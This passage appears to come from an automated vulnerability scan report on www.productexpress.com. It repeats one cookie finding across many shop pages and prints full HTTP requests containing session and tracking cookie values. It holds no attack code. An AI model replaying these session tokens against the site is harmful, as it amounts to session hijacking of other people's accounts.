HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:37 GMT Server: Apache Set-Cookie: JSESSIONID=FF374D327CD16898894C3A6FC4614ECB; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/corpsales HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:52 GMT Server: Apache Set-Cookie: JSESSIONID=7D05B3CB0781501641442B348802B082; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/csindex HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:27 GMT Server: Apache Set-Cookie: JSESSIONID=5FCC418A0CE46FEB13438C3FF003DB29; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/gcbuy HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:41 GMT Server: Apache Set-Cookie: JSESSIONID=BBC32AB911F0C78ABB79B9982DC2EC0E; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/payment HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:40 GMT Server: Apache Set-Cookie: JSESSIONID=102B8B69F792CFC1BAE04C900AA094C0; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/pop-espanol HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:28 GMT Server: Apache Set-Cookie: JSESSIONID=5D5D5910D5AE374673A26D006FCD85AA; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/privacy HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:47 GMT Server: Apache Set-Cookie: JSESSIONID=F52D67B21B9D2F56256FF08891F9B59F; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/savings-updates HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:29 GMT Server: Apache Set-Cookie: JSESSIONID=69F20504AD2C709AEC227A6C2F7C949B; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/shipping HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:34 GMT Server: Apache Set-Cookie: JSESSIONID=C11B452F5D1D20ACC9296E21316EEFE2; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/site-guide HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:53 GMT Server: Apache Set-Cookie: JSESSIONID=FDB9715CDF660FBAF1C2264A123632B0; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/terms HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:51 GMT Server: Apache Set-Cookie: JSESSIONID=BE3478F3E54C152C0317DC57541F8F91; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /info/why-shop HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:00:33 GMT Server: Apache Set-Cookie: JSESSIONID=BFC482226C0A60FDAD4B67B4AB4C7629; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> < ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jewelry.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:30 GMT Server: Apache Set-Cookie: JSESSIONID=98556AD2A695E021F9C26729F9C58465; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>J ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kids-shoes.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:56 GMT Server: Apache Set-Cookie: JSESSIONID=8E083B6937B62268CEE5C8C45896BDA7; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>K ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kids.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:19 GMT Server: Apache Set-Cookie: JSESSIONID=E595CA2D758601FAFFD02CE61E1D0F72; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>K ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /kurt-muller-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:34 GMT Server: Apache Set-Cookie: JSESSIONID=568C9932C468F740DBA4F22F477E01A8; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>K ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /laptop-bags.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:08 GMT Server: Apache Set-Cookie: JSESSIONID=C6651F0C4281F2CB31B5669D4F89ED2B; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /leather-goods-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:04:58 GMT Server: Apache Set-Cookie: JSESSIONID=EB41D4446000139BA8C30FFB1CD3BB56; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /leather-goods.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:03:35 GMT Server: Apache Set-Cookie: JSESSIONID=2ECD9926EE4EF7DB3EEE7ECA199710FE; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /leather-island-belts.htm HTTP/1.1 Host: www.productexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=CmW2cE1VR1oAAC1VAy9uAg==; Productexpress.com_sess=359de4221d0baede4fc74bdc95c33a3e; cmRS=&t1=1297434483109&t2=1297434484266&t3=1297434516075&t4=1297434482516<i=1297434516074&ln=&hr=/belts.htm&fti=&fn=search%3A0%3Bsubscription%3A1%3B&ac=&fd=&uer=&fu=&pi=Home%20Page&ho=data.coremetrics.com/cm%3F&ci=90242780&cjen=1; JSESSIONID=BB0903C5D78D870ACEE6288F26882CB9; sb2=AAAAgU1VR0cAADOsAyTRAg==; 90242780_clogin=l=1297434471&v=1&e=1297436316076; cmTPSet=Y; CoreID6=49019446611112974344713&ci=90242780; NSC_1-26STU9-qh10.101.208.29=ffffffff096da86145525d5f4f58455e445a4a423660;
Response
HTTP/1.0 200 OK Date: Fri, 11 Feb 2011 15:06:22 GMT Server: Apache Set-Cookie: JSESSIONID=07B38E23FC5512108AE51EE16C384F37; Path=/ Edge-control: !no-store,max-age=1800 pagetype: thumb Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>L ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
